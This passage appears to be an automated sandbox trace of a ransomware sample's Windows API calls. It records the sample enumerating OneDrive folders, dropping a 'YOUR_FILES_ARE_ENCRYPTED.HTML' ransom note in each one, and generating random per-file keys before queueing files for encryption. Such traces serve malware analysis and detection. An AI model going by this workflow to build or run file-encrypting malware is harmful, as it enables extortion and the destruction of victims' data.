ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6915b22f, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="af", cAlternateFileName="")) returned 1 [0112.807] StrStrIW (lpFirst="af", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.807] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\af") returned 78 [0112.807] GetProcessHeap () returned 0x600000 [0112.807] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0112.808] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\af" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\af") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\af" [0112.808] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\af", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\af\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\af\\*" [0112.809] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\af\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6915b22f, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6915b22f, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x693e3c42, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632ea0, dwReserved1=0xfc938507, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0112.810] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6915b22f, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6915b22f, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x693e3c42, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632ea0, dwReserved1=0xfc938507, cFileName="..", cAlternateFileName="")) returned 1 [0112.810] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x693e3c42, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x693e3c42, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6969295c, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x158c0, dwReserved0=0x632ea0, dwReserved1=0xfc938507, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.810] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.810] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\af\\FileSync.LocalizedResources.dll.mui") returned 114 [0112.810] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.810] lstrlenW (lpString=".mui") returned 4 [0112.810] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.810] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x693e3c42, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x693e3c42, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6969295c, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x158c0, dwReserved0=0x632ea0, dwReserved1=0xfc938507, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.810] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0112.810] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\af\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0112.810] GetProcessHeap () returned 0x600000 [0112.810] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6b05e8 [0112.811] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\af\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\af\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0112.811] WriteFile (in: hFile=0x334, lpBuffer=0x6b05e8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6b05e8*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.812] CloseHandle (hObject=0x334) returned 1 [0112.812] GetProcessHeap () returned 0x600000 [0112.812] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b05e8 | out: hHeap=0x600000) returned 1 [0112.812] GetProcessHeap () returned 0x600000 [0112.812] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0112.812] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69941380, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x69941380, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x69941380, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="am-et", cAlternateFileName="")) returned 1 [0112.812] StrStrIW (lpFirst="am-et", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.812] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\am-et") returned 81 [0112.812] GetProcessHeap () returned 0x600000 [0112.812] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0112.812] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\am-et" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\am-et") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\am-et" [0112.812] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\am-et", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\am-et\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\am-et\\*" [0112.812] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\am-et\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69941380, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x69941380, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6a02b589, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632ea0, dwReserved1=0xfc938507, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0112.813] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69941380, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x69941380, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6a02b589, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632ea0, dwReserved1=0xfc938507, cFileName="..", cAlternateFileName="")) returned 1 [0112.813] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a02b589, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6a02b589, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6abcad0b, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x114c0, dwReserved0=0x632ea0, dwReserved1=0xfc938507, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.813] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.813] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\am-et\\FileSync.LocalizedResources.dll.mui") returned 117 [0112.813] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.813] lstrlenW (lpString=".mui") returned 4 [0112.813] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.813] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a02b589, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6a02b589, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6abcad0b, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x114c0, dwReserved0=0x632ea0, dwReserved1=0xfc938507, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.814] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0112.814] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\am-et\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0112.814] GetProcessHeap () returned 0x600000 [0112.814] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6b05e8 [0112.814] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\am-et\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\am-et\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0112.814] WriteFile (in: hFile=0x334, lpBuffer=0x6b05e8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6b05e8*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.815] CloseHandle (hObject=0x334) returned 1 [0112.815] GetProcessHeap () returned 0x600000 [0112.815] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b05e8 | out: hHeap=0x600000) returned 1 [0112.815] GetProcessHeap () returned 0x600000 [0112.815] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0112.815] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6abcad0b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6abcad0b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6abcad0b, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="amd64", cAlternateFileName="")) returned 1 [0112.815] StrStrIW (lpFirst="amd64", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.815] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\amd64") returned 81 [0112.815] GetProcessHeap () returned 0x600000 [0112.815] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0112.815] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\amd64" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\amd64") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\amd64" [0112.815] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\amd64", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\amd64\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\amd64\\*" [0112.815] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\amd64\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6abcad0b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6abcad0b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6ae5336a, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632ea0, dwReserved1=0xfc938507, cFileName=".", cAlternateFileName="")) returned 0x626778 [0112.816] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6abcad0b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6abcad0b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6ae5336a, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632ea0, dwReserved1=0xfc938507, cFileName="..", cAlternateFileName="")) returned 1 [0112.816] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ae5336a, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6ae5336a, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6b71df77, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0x632ea0, dwReserved1=0xfc938507, cFileName="FileSyncApi64.dll", cAlternateFileName="FILESY~1.DLL")) returned 1 [0112.816] StrStrIW (lpFirst="FileSyncApi64.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.816] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\amd64\\FileSyncApi64.dll") returned 99 [0112.816] PathFindExtensionW (pszPath="FileSyncApi64.dll") returned=".dll" [0112.816] lstrlenW (lpString=".dll") returned 4 [0112.816] PathFindExtensionW (pszPath="FileSyncApi64.dll") returned=".dll" [0112.816] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0112.816] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\amd64\\FileSyncApi64.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\amd64\\filesyncapi64.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x330 [0112.816] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=262144) returned 1 [0112.816] GetProcessHeap () returned 0x600000 [0112.816] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0112.819] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="72") returned 2 [0112.820] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="4A") returned 2 [0112.820] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="83") returned 2 [0112.820] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="73") returned 2 [0112.820] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="DA") returned 2 [0112.820] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="85") returned 2 [0112.820] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="17") returned 2 [0112.820] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="5A") returned 2 [0112.820] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="79") returned 2 [0112.820] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="16") returned 2 [0112.820] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="0C") returned 2 [0112.820] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="ED") returned 2 [0112.820] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="08") returned 2 [0112.820] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="B8") returned 2 [0112.820] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="F9") returned 2 [0112.820] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="A8") returned 2 [0112.820] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="66") returned 2 [0112.820] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="BC") returned 2 [0112.820] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="6F") returned 2 [0112.820] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="15") returned 2 [0112.820] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="1F") returned 2 [0112.820] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="DB") returned 2 [0112.820] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="DF") returned 2 [0112.820] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="52") returned 2 [0112.820] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="4D") returned 2 [0112.820] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="25") returned 2 [0112.820] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="3C") returned 2 [0112.820] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="AB") returned 2 [0112.820] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="97") returned 2 [0112.820] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="33") returned 2 [0112.820] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="7B") returned 2 [0112.820] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="46") returned 2 [0112.821] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\amd64\\FileSyncApi64.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\amd64\\FileSyncApi64.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\amd64\\FileSyncApi64.dll" [0112.821] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0112.821] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0112.821] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ae5336a, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6ae5336a, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6b71df77, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0x632ea0, dwReserved1=0xfc938507, cFileName="FileSyncApi64.dll", cAlternateFileName="FILESY~1.DLL")) returned 0 [0112.821] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0112.821] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\amd64\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0112.821] GetProcessHeap () returned 0x600000 [0112.821] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6b05e8 [0112.821] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\amd64\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\amd64\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0112.822] WriteFile (in: hFile=0x334, lpBuffer=0x6b05e8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6b05e8*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.841] CloseHandle (hObject=0x334) returned 1 [0112.841] GetProcessHeap () returned 0x600000 [0112.841] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b05e8 | out: hHeap=0x600000) returned 1 [0112.842] GetProcessHeap () returned 0x600000 [0112.842] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0112.844] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c2263c9, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x4c2263c9, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x4c416268, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x123c, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="AutoPlayLogo.png", cAlternateFileName="AUTOPL~1.PNG")) returned 1 [0112.844] StrStrIW (lpFirst="AutoPlayLogo.png", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.844] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\AutoPlayLogo.png") returned 92 [0112.844] PathFindExtensionW (pszPath="AutoPlayLogo.png") returned=".png" [0112.844] lstrlenW (lpString=".png") returned 4 [0112.844] PathFindExtensionW (pszPath="AutoPlayLogo.png") returned=".png" [0112.844] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0112.844] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\AutoPlayLogo.png" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\autoplaylogo.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0112.844] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=4668) returned 1 [0112.844] GetProcessHeap () returned 0x600000 [0112.844] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0112.847] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="7F") returned 2 [0112.847] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="23") returned 2 [0112.847] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="55") returned 2 [0112.847] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="EA") returned 2 [0112.847] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="DF") returned 2 [0112.847] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="64") returned 2 [0112.847] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="AE") returned 2 [0112.847] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" 